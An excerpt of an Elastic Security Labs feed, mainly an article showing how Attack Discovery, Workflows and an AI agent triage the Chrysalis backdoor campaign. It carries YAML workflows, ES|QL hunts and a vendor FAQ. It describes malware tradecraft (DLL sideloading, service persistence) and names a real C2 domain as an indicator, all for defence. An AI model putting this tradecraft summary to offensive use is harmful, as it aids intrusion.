<h2><strong>Agentic SOC with Elastic: Frequently Asked Questions</strong></h2>
<p><strong>Q: What is an Agentic AI SOC?</strong> <strong>A:</strong> It is an autonomous Security Operations Center where AI agents independently manage triage, investigation, response, and other operational tasks. It shifts the focus from managing &quot;alerts&quot; to neutralizing &quot;attacks&quot; with minimal manual intervention.</p>
<p><strong>Q: Why should enterprises upgrade to an agentic model?</strong> <strong>A:</strong> The industry is at a practical inflection point where governance and agent frameworks have matured for enterprise production, offering a strategic window to scale defense against a rapidly evolving threat landscape.</p>
<p><strong>Q: How does an Agentic AI SOC differ from a traditional SOC or AI copilot?</strong> <strong>A:</strong> Autonomy. While a Copilot acts as a &quot;passenger&quot; that provides answers on command, an Agent is a &quot;driver&quot; that independently plans, executes, and coordinates complex investigations.</p>
<p><strong>Q: Do I need to know how to code to build and manage these agents?</strong> <strong>A:</strong> No. Elastic Agent Builder uses natural language to translate strategic intent into autonomous behavior, allowing practitioners to &quot;program&quot; threat hunting agents without writing code.</p>
<p><strong>Q: Can an agent actually take response actions, like isolating a host?</strong> <strong>A:</strong> Yes. Through integration with Elastic Workflows, agents can execute &quot;guarded&quot; actions, such as host isolation or case creation, once they meet your pre-defined confidence thresholds, while giving SOC analysts the option to review or intervene before critical actions are taken.</p>
<p><strong>Q: Is every action taken by an autonomous agent auditable?</strong> <strong>A:</strong> Absolutely. Every decision is documented in a reasoning trace, providing a transparent audit trail that shows the exact logic, tools, and evidence the agent used.</p>
<h2><strong>External References</strong></h2>
<ul>
<li><a href="https://machinelearningmastery.com/7-agentic-ai-trends-to-watch-in-2026/">https://machinelearningmastery.com/7-agentic-ai-trends-to-watch-in-2026/</a></li>
<li><a href="https://www.marketsandmarkets.com/Market-Reports/ai-agents-market-15761548.html">https://www.marketsandmarkets.com/Market-Reports/ai-agents-market-15761548.html</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/photo-edited-11@2x.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Speeding APT Attack Confirmation with Attack Discovery, Workflows, and Agent Builder]]></title>
            <link>https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder</link>
            <guid>speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder</guid>
            <pubDate>Wed, 18 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article walks through how Elastic Security's Attack Discovery, combined with Workflows and Agent Builder, can automatically detect, correlate, and confirm APT-level attacks like Chrysalis while reducing analyst response time from hours to minutes.]]></description>
            <content:encoded><![CDATA[<p><strong>9:15 AM: The Non-Event</strong> - A headline breaks: &quot;<a href="https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/">Chrysalis Backdoor: A Deep Dive into Lotus Blossom</a>.&quot; Your CISO sends a Slack message: &quot;Are we affected?&quot;</p>
<p>In a traditional SOC, you’re about to lose your entire morning to a manual scramble - sifting through dozens of alerts, writing queries, manually checking VirusTotal, and pivoting across index patterns to build a timeline hoping you don’t miss something.</p>
<p>But in an Agentic SOC, the work is already done. Attack Discovery, running on its hourly schedule, had already correlated 5 critical alerts out of 30+ into a single attack narrative: &quot;Malware with DLL Side-Loading Persistence.&quot; That discovery automatically triggered a workflow, which handed the findings to an agent. The agent used its tools and verified the malware hash on VirusTotal, searched your logs with ES|QL, checked the on-call schedule, created a case, and spun up a Slack incident channel with the on-call analyst already added, and also generated a CISO-ready summary — all before you sat down for coffee.</p>
<p>You reply to your CISO: &quot;Already confirmed and triaged. The case is open. Here's the link.&quot;</p>
<p>This post explains how we built that pipeline: the integration of <a href="https://www.elastic.co/security/ai">Attack Discovery</a>, <a href="https://www.elastic.co/elasticsearch/workflows">Workflows</a>, and <a href="https://www.elastic.co/elasticsearch/agent-builder">Agent Builder</a>.</p>
<h2>The threat: Chrysalis backdoor by Lotus Blossom</h2>
<h3>Threat actor profile</h3>
<table>
<thead>
<tr>
<th align="left">Attribute</th>
<th align="left">Details</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Name</strong></td>
<td align="left">Lotus Blossom (aka Billbug, Raspberry Typhoon, Spring Dragon)</td>
</tr>
<tr>
<td align="left"><strong>Origin</strong></td>
<td align="left">China (state-sponsored)</td>
</tr>
<tr>
<td align="left"><strong>Active Since</strong></td>
<td align="left">2009</td>
</tr>
<tr>
<td align="left"><strong>Motivation</strong></td>
<td align="left">Espionage</td>
</tr>
<tr>
<td align="left"><strong>Target Sectors</strong></td>
<td align="left">Government, Telecom, Aviation, Critical Infrastructure, Media</td>
</tr>
<tr>
<td align="left"><strong>Target Regions</strong></td>
<td align="left">Southeast Asia, Central America</td>
</tr>
</tbody>
</table>
<h3>Campaign overview</h3>
<p>Lotus Blossom executed a <strong>supply chain compromise</strong> of Notepad++ update infrastructure:</p>
<ul>
<li><strong>Attack Window:</strong> June 2025 – December 2025 (~6 months)</li>
<li><strong>Vector:</strong> Hijacked Notepad++ update mechanism (WinGUp)</li>
<li><strong>Method:</strong> Selective redirection of targeted users to malicious update servers</li>
<li><strong>Payload:</strong> Previously undocumented &quot;Chrysalis&quot; backdoor</li>
<li><strong>Discovery:</strong> Rapid7 MDR team, published 2026-02-02</li>
</ul>
<h3>Chrysalis backdoor capabilities</h3>
<p>The Chrysalis backdoor is a sophisticated, feature-rich implant:</p>
<ul>
<li>Custom encryption (LCG, FNV-1a hashing, MurmurHash)</li>
<li>Reflective DLL loading</li>
<li>API hashing for evasion</li>
<li>DLL sideloading via legitimate Bitdefender binary (<code>BluetoothService.exe</code>)</li>
<li>Full remote access capabilities</li>
<li>Persistent Windows service installation</li>
</ul>
<h3>Attack chain</h3>
<pre><code>[1] INITIAL ACCESS
    └── User executes malicious NSIS installer from Desktop
              ↓
[2] EXECUTION
    └── Installer drops files to hidden AppData folder
        ├── BluetoothService.exe (legitimate binary)
        └── log.dll (malicious Chrysalis loader)
              ↓
[3] PERSISTENCE
    └── BluetoothService.exe registered as Windows service
        └── Runs under SYSTEM context
              ↓
[4] DEFENSE EVASION
    └── DLL sideloading via legitimate signed binary
              ↓
[5] COMMAND &amp; CONTROL
    └── DNS beacon to api[.]skycloudcenter[.]com ✅ CONFIRMED
</code></pre>
<h3>MITRE ATT&amp;CK mapping</h3>
<table>
<thead>
<tr>
<th align="left">Tactic</th>
<th align="left">Technique</th>
<th align="left">ID</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Initial Access</td>
<td align="left">Supply Chain Compromise</td>
<td align="left">T1195.002</td>
</tr>
<tr>
<td align="left">Execution</td>
<td align="left">User Execution</td>
<td align="left">T1204.002</td>
</tr>
<tr>
<td align="left">Persistence</td>
<td align="left">Windows Service</td>
<td align="left">T1543.003</td>
</tr>
<tr>
<td align="left">Defense Evasion</td>
<td align="left">DLL Side-Loading</td>
<td align="left">T1574.002</td>
</tr>
<tr>
<td align="left">Command &amp; Control</td>
<td align="left">DNS</td>
<td align="left">T1071.004</td>
</tr>
</tbody>
</table>
<h2>The Challenge: Speed vs. Accuracy</h2>
<p>When threat intelligence drops on a nation-state APT campaign, SOC teams face a brutal trade-off:</p>
<p><strong>Speed:</strong> Executives want answers <em>now</em>. &quot;Are we compromised?&quot;</p>
<p><strong>Accuracy:</strong> Analysts need time to hunt, correlate, and confirm before making the call.</p>
<p>Traditional workflows require analysts to:</p>
<ol>
<li>Determine the scope of analysis and relevant search criteria</li>
<li>Manually search for IOCs across multiple data sources</li>
<li>Correlate alerts that may span days or weeks</li>
<li>Validate findings against threat intelligence</li>
<li>Build the attack timeline</li>
<li>Escalate with confidence</li>
</ol>
<p>This process takes <strong>hours to days</strong>, during which an active attacker may exfiltrate data or move laterally.</p>
<h2>The Solution: Attack Discovery + Workflows + Agent Builder</h2>
<p>Elastic Security's AI-powered automation stack transforms this workflow from manual hunting to <strong>automated confirmation</strong>. But before we dive into the specific setup, it's worth understanding how the building blocks fit together.</p>
<h3>Agents &amp; Workflows: Two entry points, one composable architecture</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image7.png" alt="Diagram showing the composable relationship between Agents and Workflows" /></p>
<p>Agent Builder gives you two primitives that work together:</p>
<ul>
<li><a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder"><strong>Agents</strong></a> are the intelligence layer. They reason about a task, decide which tools to call, and adapt based on what they find. An agent can call search tools, MCP tools, and critically - <strong>workflows as tools</strong>.</li>
<li><a href="https://www.elastic.co/docs/explore-analyze/workflows"><strong>Workflows</strong></a> are the structure layer. They're deterministic pipelines: steps run in order, reliably and repeatably. Any step in a workflow can optionally be an <strong>agent step</strong>, giving it the ability to reason mid-pipeline.</li>
</ul>
<p>The two are fully composable. A workflow can invoke an agent. An agent can call a workflow. An agent step inside a workflow can call another workflow. Every connection is optional, allowing you to mix and match based on what the problem demands.</p>
<p>This is what makes the architecture powerful: <strong>agents reason and decide; workflows execute and coordinate</strong>. For our Chrysalis attack scenario, we used both.</p>
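<p>To make the composition concrete, here is a minimal, illustrative workflow whose single step hands an alert to an agent through the Agent Builder converse API. The agent ID is a placeholder, and the shape follows the <code>kibana.request</code> step type used later in this post:</p>

```yaml
# Illustrative only: a minimal workflow whose single step invokes an agent.
# The agent ID is a placeholder.
name: Minimal Agentic Workflow
enabled: true
triggers:
  - type: alert
steps:
  - name: ask_agent
    type: kibana.request
    with:
      method: "POST"
      path: "/api/agent_builder/converse"
      headers:
        kbn-xsrf: "true"
      body:
        agent_id: <your-agent-id>
        input: "Triage this alert and report back: {{event|json}}"
```

The inverse direction - an agent calling a workflow - needs no YAML at all: you register the workflow as a tool, and the agent decides when to invoke it.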
<h3>Our Flow</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image10.png" alt="" /></p>
<p><strong>The Flow:</strong></p>
<ol>
<li><strong>Many Alerts</strong> → Attack Discovery correlates disparate alerts into a single attack narrative</li>
<li><strong>Attack Discovery</strong> → Generates an alert that triggers the workflow</li>
<li><strong>Workflow</strong> → Invokes Agent Builder to analyze the attack discovery findings</li>
<li><strong>Agent Builder</strong> → Calls enrichment workflows (VirusTotal, Threat Intel, ES|QL queries)</li>
<li><strong>Agent Builder Calls a Workflow</strong> → Agent Builder continues with incident response actions, calling workflows as tools (case actions, isolate host, notify team)</li>
</ol>
<h2>Step 1: Attack Discovery surfaces the threat</h2>
<p>Attack Discovery uses LLMs to analyze security alerts and identify attack patterns. Unlike traditional alert grouping, it understands the <strong>semantic relationships</strong> between alerts.</p>
<h3>The alert queue: Needle in a haystack</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image4.png" alt="Shows the raw Elastic Security alerts table with dozens of alerts across different rules, severities, hosts, and users." /></p>
<p>Here's the reality for a SOC analyst. You open the alerts page and see dozens of alerts across multiple hosts, users, and rules: mixed severities, mixed types, many of them noise.</p>
<p>Dozens of alerts. Multiple rules firing. Severity levels ranging from low to critical. Some are the Chrysalis attack. Some are unrelated Windows Defender events. Some are SIEM change detections from a completely different workflow. It’s difficult to find the coordinated attack in this wall of noise.</p>
<h3>What Attack Discovery found</h3>
<p>Attack Discovery analyzed all of these alerts and identified <strong>5 alerts</strong> that belonged to a single coordinated attack - pulling them out of the noise and correlating them into one narrative:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image6.png" alt="Shows the Attack Discovery showing a summary of the correlated attack" /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image11.png" alt="Shows the Attack Discovery view with the correlated attack: 5 alerts, all critical, tied to a host and user." /></p>
<p>Instead of presenting 5 individual alerts, Attack Discovery correlated them into a single discovery:</p>
<p><strong>Malware with DLL Side-Loading Persistence</strong></p>
<p>Malicious executable on <code>srv-win-defend-01</code> escalated to persistence via <code>BluetoothService.exe</code> with DLL side-loading</p>
<ul>
<li><strong>Host:</strong> srv-win-defend-01</li>
<li><strong>User:</strong> james_spiteri</li>
<li><strong>Severity:</strong> Critical</li>
<li><strong>Attack Chain:</strong> Initial Access → Execution → Persistence → Defense Evasion → C2</li>
</ul>
<p>Attack Discovery also:</p>
<ul>
<li>Mapped alerts to MITRE ATT&amp;CK tactics</li>
<li>Identified the DLL sideloading technique</li>
<li>Flagged the suspicious persistence mechanism</li>
<li>Highlighted the C2 network indicator</li>
</ul>
<h2>Step 2: Scheduled discovery triggers the workflow</h2>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image2.png" alt="Shows Attack Discovery’s scheduling page where users can schedule attack discovery to run at desired intervals." /></p>
<p>Attack Discovery doesn't require an analyst to click a button. We configured it to run on an <a href="https://www.elastic.co/docs/api/doc/serverless/operation/operation-createattackdiscoveryschedules"><strong>hourly schedule</strong></a>, continuously analyzing the latest alerts for coordinated attacks.</p>
<p>When our hourly run kicked off, it ingested all alerts from the last hour - including the Chrysalis-related alerts buried among routine detections - and surfaced the DLL side-loading attack as a discovery.</p>
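<p>As a rough sketch, creating such a schedule programmatically might look like this. The payload fields below are assumptions based on the linked API reference, not a verbatim request - check the docs for your version:</p>

```python
# Sketch only: building a request body for an hourly Attack Discovery
# schedule. Field names are assumptions based on the linked API reference.
import json

def build_schedule_payload(name: str, interval: str = "1h") -> dict:
    """Build an illustrative Attack Discovery schedule request body."""
    return {
        "name": name,
        "enabled": True,
        "schedule": {"interval": interval},  # run every hour
        "params": {"alertsIndexPattern": ".alerts-security.alerts-default"},
    }

payload = build_schedule_payload("Hourly APT sweep")
print(json.dumps(payload, indent=2))
```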
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image8.png" alt="Shows Attack Discovery schedule editor linked to specific workflows." /></p>
<p>Linking a workflow as an action step from Attack Discovery means that every time Attack Discovery finds a coordinated attack, it automatically fires the workflow.</p>
<p>But here's what makes this approach different from traditional SOAR playbooks: the workflow doesn't script out every step. It hands the entire attack discovery to Agent Builder and says <em>&quot;figure it out.&quot;</em></p>
<h3>Workflow definition</h3>
<p>This is the actual workflow we used. It consists of just two steps:</p>
<pre><code>name: Auto Triage AD
description: &gt;-
  Demonstrates the application of AI agents and workflows 
  to enable agentic alert triaging.
enabled: true
tags:
  - Example
  - Agentic Workflow

triggers:
  - type: alert                          # Fires when Attack Discovery generates an alert

steps:
  # Step 1: Hand the attack discovery to the agent with clear instructions
  - name: initial_analysis
    type: kibana.request
    with:
      method: &quot;POST&quot;
      path: &quot;/api/agent_builder/converse&quot;
      headers:
        kbn-xsrf: &quot;true&quot;
      body:
        agent_id: &lt;your-agent-id&gt;        # Your custom Hunting Agent
        input: |
          Confirm the attack by searching for behaviour in the logs 
          (all logs which are relevant), always leverage security labs tools, 
          always leverage virustotal if file hashes are available. 
          If this is a true positive, create a case with all the relevant content too.

          {{event|json}}

          Create a slack channel for this incident, check who's on call, 
          add them to it, and send a formatted message with what's happening 
          and next steps. If this is a true positive, create a case with all 
          the relevant content too - add a button to the slack message linking 
          to the case, and another button leading to the result of the attack. 
          Lastly, include a button that will take me to this agent conversation, 
          just replace the conversation ID with the actual one from this conversation 
          (https://&lt;your-kibana-url&gt;/app/agent_builder/conversations/&lt;conversation-id&gt;)

          Change the attack discovery status to acknowledged, or, 
          if false positives, close it.
    timeout: 10m
    on-failure:
      retry:
        max-attempts: 3

  # Step 2: Follow up to catch anything that didn't complete
  - name: followup_analysis
    type: kibana.request
    with:
      method: &quot;POST&quot;
      path: &quot;/api/agent_builder/converse&quot;
      headers:
        kbn-xsrf: &quot;true&quot;
      body:
        conversation_id: &quot;{{ steps.initial_analysis.output.conversation_id }}&quot;
        agent_id: &lt;your-agent-id&gt;
        input: |
          Complete any previous steps which might not have ran successfully. 
          Just in case, the conversation ID is 
          {{ steps.initial_analysis.output.conversation_id }}
    timeout: 10m
    on-failure:
      retry:
        max-attempts: 3
</code></pre>
<h3>Why this workflow is so short</h3>
<p>The entire automation is <strong>two steps</strong>:</p>
<ol>
<li><strong><code>initial_analysis</code></strong>: Send the attack discovery to Agent Builder with natural language instructions describing what you want done</li>
<li><strong><code>followup_analysis</code></strong>: A failsafe that resumes the same conversation and asks the agent to verify all tasks were completed. Because agents call multiple tools in sequence and any individual tool call could time out or hit a transient error, this step ensures nothing falls through the cracks.</li>
</ol>
<p>This is the fundamental shift: <strong>the workflow is the trigger and the safety net; the agent is the brain</strong>.</p>
<h2>Under the hood: How we extended the Threat Hunting Agent</h2>
<p>Before we continue with the results, it's worth pausing on what made this possible. One of Agent Builder's most powerful capabilities is that you can <strong>extend existing agents</strong> with additional tools. Rather than building from scratch, we took the default <strong>Threat Hunting Agent</strong> and added custom workflow-backed tools to give it the specific capabilities this scenario required.</p>
<h3>What we added</h3>
<p>Agent Builder ships with built-in platform tools like <code>platform.core.generate_esql</code> and <code>platform.core.product_documentation</code>. But the real power comes from adding your own. We extended the Threat Hunting Agent with tools across several categories:</p>
<table>
<thead>
<tr>
<th align="left">Tool</th>
<th align="left">Type</th>
<th align="left">What It Does</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>vt.hash.lookup</code></td>
<td align="left">Workflow (custom)</td>
<td align="left">Analyze a file hash with VirusTotal</td>
</tr>
<tr>
<td align="left"><code>check.on.call.schedule</code></td>
<td align="left">Workflow (custom)</td>
<td align="left">Query the on-call schedule to find the current responder</td>
</tr>
<tr>
<td align="left"><code>create.case</code></td>
<td align="left">Workflow (custom)</td>
<td align="left">Create a case in Elastic Security</td>
</tr>
<tr>
<td align="left"><code>create.channel</code></td>
<td align="left">Workflow (custom)</td>
<td align="left">Create a Slack channel for incident coordination</td>
</tr>
<tr>
<td align="left"><code>get.time</code></td>
<td align="left">Workflow (custom)</td>
<td align="left">Get the current time for naming and timestamps</td>
</tr>
</tbody>
</table>
<p>Five custom tools. That's all it took to turn the default Threat Hunting Agent into one that automatically verifies malware, searches logs, finds the on-call responder, creates a case, and spins up an incident channel - all shrinking the time to detect and confirm a potential threat.</p>
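<p>For a sense of what a workflow-backed tool looks like, here is a sketch of how <code>vt.hash.lookup</code> might be defined. The VirusTotal v3 file-lookup endpoint and <code>x-apikey</code> header are the real API; the <code>http.request</code> step type, input templating, and secret reference are illustrative assumptions:</p>

```yaml
# Sketch of a workflow-backed tool. Step type and templating syntax are
# illustrative; the VirusTotal v3 endpoint and header are real.
name: vt.hash.lookup
description: Analyze a file hash with VirusTotal
steps:
  - name: lookup_hash
    type: http.request
    with:
      method: "GET"
      url: "https://www.virustotal.com/api/v3/files/{{ inputs.hash }}"
      headers:
        x-apikey: "{{ secrets.virustotal_api_key }}"
```

Once registered as a tool, the agent can call it whenever a file hash shows up in the evidence, without any human routing the request.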
<h3>The Agent's reasoning chain</h3>
<p>Here's what's remarkable: given the Attack Discovery context, the agent automatically decided which tools to call and in what order. No human scripted these steps.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image1.png" alt="Shows the agent's reasoning chain: starting with VirusTotal lookup on the file hash, then generating an ES|QL query to search endpoint logs for the affected host, user, and malicious processes. Demonstrates autonomous tool selection." /></p>
<p><strong>Step 1: VirusTotal Lookup</strong>: <code>vt.hash.lookup</code></p>
<ul>
<li>The agent's first move: verify the malware hash.</li>
</ul>
<p><strong>Step 2: Generate ES|QL Query</strong>: <code>platform.core.generate_esql</code></p>
<ul>
<li>With malware confirmed, the agent searched for all related activity.</li>
</ul>
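<p>The exact generated query isn't shown here, but a hunt for the Chrysalis artifacts named above might look something like the following ES|QL sketch - the index pattern and ECS field names are assumptions, so adjust them to your environment:</p>

```esql
FROM logs-endpoint.events.*
| WHERE host.name == "srv-win-defend-01"
    AND (process.name == "BluetoothService.exe" OR file.name == "log.dll")
| STATS events = COUNT(*) BY event.category, process.name, user.name
| SORT events DESC
```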
<p><strong>Step 3: Product Documentation</strong>: <code>platform.core.product_documentation</code></p>
<ul>
<li>The agent referenced Elastic Security docs to generate remediation commands for the Response Console.</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image3.png" alt="Reasoning steps showing which tools were called in sequence for transparency" /></p>
<p><em>Shows the additional reasoning chain: referencing product documentation, then checking the on-call schedule information before creating a case with all relevant information and notifying the analyst on call over Slack.</em></p>
<p><strong>Step 4: Check current time:</strong> <code>get.time</code></p>
<p><strong>Step 5: Check On-Call Schedule</strong>: <code>check.on.call.schedule</code></p>
<ul>
<li>The agent ran an ES|QL query against the <code>on-call-schedule</code> index to find the current responder:</li>
</ul>
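<p>For illustration, a query along these lines would do the job - the <code>on-call-schedule</code> index name comes from the scenario, while the field names are hypothetical:</p>

```esql
FROM on-call-schedule
| WHERE shift_start <= NOW() AND shift_end > NOW()
| KEEP analyst.name, analyst.slack_handle
| LIMIT 1
```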
<p><strong>Step 6: Create Case</strong>: <code>create.case</code></p>
<p><strong>Step 7: Create Slack Channel</strong>: <code>create.channel</code></p>
<h3>Why this matters</h3>
<p>The agent wasn't following a script. It <strong>reasoned</strong> about the situation and decided:</p>
<ol>
<li>First, verify the malware is real (VirusTotal)</li>
<li>Then, understand the impact (ES|QL log search)</li>
<li>Then, figure out how to remediate (product documentation)</li>
<li>Then, find the right person to respond (on-call schedule)</li>
<li>Then, create tracking artifacts (case)</li>
<li>Finally, coordinate the team (Slack channel)</li>
</ol>
<p>This is the difference between a workflow (which follows a fixed sequence) and an agent (which reasons about what to do next). The workflow triggered the agent; the agent figured out the rest.</p>
<h2>Step 3: Automated incident response</h2>
<p>With high-confidence confirmation, the workflow automatically:</p>
<h3>1. Creates an incident Case</h3>
<p>A structured case is created with all relevant evidence attached:</p>
<ul>
<li>Attack Discovery findings</li>
<li>VirusTotal analysis results</li>
<li>Threat intelligence matches</li>
<li>Agent Builder analysis</li>
<li>Recommended response actions</li>
</ul>
<h3>2. Notifies the SOC</h3>
<p>A Slack message is sent to the right channel informing analysts of the critical incident.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image5.png" alt="Shows the actual Slack channel with the Incident Bot  posting the full attack summary, malware details, attack chain, MITRE ATT&amp;CK mapping, and immediate next steps." /></p>
<h3>3. Enables Response Actions</h3>
<p>The workflow can optionally trigger automated response actions:</p>
<ul>
<li><strong>Host Isolation:</strong> Isolate <code>srv-win-defend-01</code> via Elastic Defend</li>
<li><strong>User Suspension:</strong> Disable <code>james_spiteri</code> in Active Directory</li>
<li><strong>Network Block:</strong> Push C2 domain to firewall blocklist</li>
<li><strong>IOC Sweep:</strong> Launch fleet-wide scan for Chrysalis indicators</li>
</ul>
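<p>For example, host isolation can be driven through the Elastic Security endpoint response actions API. The sketch below only builds the request - the Kibana URL and endpoint ID are placeholders, and authentication is omitted:</p>

```python
# Sketch: building a host-isolation request against the Elastic Security
# endpoint response actions API. URL and endpoint ID are placeholders;
# authentication headers are omitted.
import json
import urllib.request

def isolate_request(kibana_url: str, endpoint_id: str, comment: str) -> urllib.request.Request:
    """Build (but do not send) a POST to the isolate response action."""
    body = json.dumps({"endpoint_ids": [endpoint_id], "comment": comment}).encode()
    return urllib.request.Request(
        url=f"{kibana_url}/api/endpoint/action/isolate",
        data=body,
        method="POST",
        headers={"kbn-xsrf": "true", "Content-Type": "application/json"},
    )

req = isolate_request("https://kibana.example.com", "abc-123", "Chrysalis containment")
print(req.full_url)
```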
<hr />
<h2>Time-to-confirmation: Before and after</h2>
<table>
<thead>
<tr>
<th align="left">Metric</th>
<th align="left">Manual Process</th>
<th align="left">Automated Pipeline</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Alert Correlation</td>
<td align="left">30-60 minutes</td>
<td align="left">Instant (Attack Discovery)</td>
</tr>
<tr>
<td align="left">IOC Extraction</td>
<td align="left">15-30 minutes</td>
<td align="left">Instant (Workflow)</td>
</tr>
<tr>
<td align="left">VirusTotal Lookup</td>
<td align="left">10-15 minutes</td>
<td align="left">5 seconds (API)</td>
</tr>
<tr>
<td align="left">Threat Intel Correlation</td>
<td align="left">30-60 minutes</td>
<td align="left">10 seconds (ES|QL)</td>
</tr>
<tr>
<td align="left">Attack Attribution</td>
<td align="left">1-4 hours</td>
<td align="left">30 seconds (Agent Builder)</td>
</tr>
<tr>
<td align="left">Incident Creation</td>
<td align="left">15-30 minutes</td>
<td align="left">Instant (Workflow)</td>
</tr>
<tr>
<td align="left">SOC Notification</td>
<td align="left">5-10 minutes</td>
<td align="left">Instant (Connector)</td>
</tr>
<tr>
<td align="left"><strong>Total Time</strong></td>
<td align="left"><strong>2-6 hours</strong></td>
<td align="left"><strong>&lt; 4 minutes</strong></td>
</tr>
</tbody>
</table>
<hr />
<h2>The other path: Just ask the Agent</h2>
<p>Everything above describes the <strong>automated</strong> pipeline - Attack Discovery finds the threat, the workflow fires, the agent triages it, and the right analysts get notified.</p>
<p>But there's another equally powerful way to use this: go directly to Agent Builder and ask it in plain English.</p>
<h3>Scenario: You read about the threat first</h3>
<p>Imagine you're scrolling through your threat intel feeds and see Rapid7's blog post about the Chrysalis backdoor. You just want to know: <em>are we compromised?</em></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image9.png" alt="" /></p>
<p>That's it. The same agent with the same tools does the rest:</p>
<ol>
<li>Reads the threat report using the <code>web.search</code> tool to pull IOCs and TTPs from the Rapid7 blog</li>
<li>Generates ES|QL queries to hunt for Chrysalis indicators across your file, network, and process event logs</li>
<li>Checks VirusTotal for any matching file hashes found in your environment</li>
<li>Produces a CISO-ready summary with findings, confidence level, and recommended actions</li>
</ol>
<p>The agent calls the same tools it would in the automated pipeline. The difference is the entry point: instead of a scheduled Attack Discovery triggering a workflow, you triggered the agent with a question.</p>
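<p>In practice, that question travels through the same <code>/api/agent_builder/converse</code> endpoint the workflow uses. A minimal sketch of the request body, with a placeholder agent ID:</p>

```python
# Sketch: the request body an analyst's plain-English question becomes
# when sent to POST /api/agent_builder/converse. Agent ID is a placeholder.
import json

def build_converse_body(agent_id: str, question: str) -> dict:
    """Build the converse API request body for a one-off question."""
    return {"agent_id": agent_id, "input": question}

body = build_converse_body(
    "<your-agent-id>",
    "We just read the Rapid7 report on the Chrysalis backdoor. "
    "Are we compromised? Hunt for its IOCs across our logs and "
    "summarize your findings with a confidence level.",
)
print(json.dumps(body))
```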
<h3>Why this changes the game for analysts</h3>
<p>This is the part that's easy to overlook but profoundly important: <strong>the analyst didn't need to know a single query language, index pattern, or tool name</strong>.</p>
<p>They didn't write ES|QL. They didn’t need to remember where their different data lives. They didn't need to remember the VirusTotal API syntax or figure out which threat intel index to query.</p>
<p>They asked a question in natural language. The agent figured out the rest including which indices to search, which queries to write, which tools to call, and how to synthesize the results.</p>
<p>For a junior analyst who joined the team last month, this is transformative. For a senior analyst who's been doing this for a decade, it's hours of their life back. For a CISO who wants a status update, it's a question away.</p>
<p>The barrier to effective threat hunting just dropped from &quot;knows ES|QL and 47 index patterns&quot; to &quot;can describe what they're looking for.&quot;</p>
<h2>Key takeaways</h2>
<ol>
<li><strong>Attack Discovery on a schedule means you don't miss attacks</strong> - it continuously analyzes your alerts, so coordinated threats get surfaced even when no one is watching the queue.</li>
<li><strong>Workflows</strong> orchestrate the response, triggering on discoveries, invoking agents, executing actions.</li>
<li><strong>Agent Builder lets you build or extend agents for your needs</strong> - whether you start from scratch or add custom tools to an existing agent, you shape the capabilities to match your environment.</li>
<li><strong>Agents reason, workflows execute</strong> - the agent autonomously decided to call VirusTotal, search logs, check the on-call schedule, and create a Slack channel. No human scripted that sequence.</li>
<li><strong>Two entry points, same power</strong> - the automated pipeline and the chat interface use the same agent and the same tools. Whether a scheduled discovery triggers it or an analyst asks a question, the outcome is the same.</li>
<li><strong>Natural language is the new query language</strong> - analysts don't need to know ES|QL, index patterns, or API syntax. They describe what they're looking for, and the agent handles the rest.</li>
</ol>
<p>The Chrysalis backdoor campaign demonstrates why this matters. When nation-state actors can compromise your supply chain and establish persistence in 4 seconds, you need defenses that can match that speed - whether that's an automated pipeline running while you sleep, or a direct conversation with an agent when you're the first to spot the threat.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/photo-edited-08.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[SolarWinds Web Help Desk Exploitation - February 2026]]></title>
            <link>https://www.elastic.co/security-labs/solarwinds-whd-exploitation</link>
            <guid>solarwinds-whd-exploitation</guid>
            <pubDate>Tue, 10 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security detection and prevention capabilities for the recently-disclosed SolarWinds Web Help Desk vulnerabilities.]]></description>
            <content:encoded><![CDATA[<h2>Summary</h2>
<ul>
<li>On February 6, 2026, Microsoft <a href="https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/">reported</a> the exploitation of <a href="https://www.solarwinds.com/web-help-desk">SolarWinds Web Help Desk</a> (WHD) servers</li>
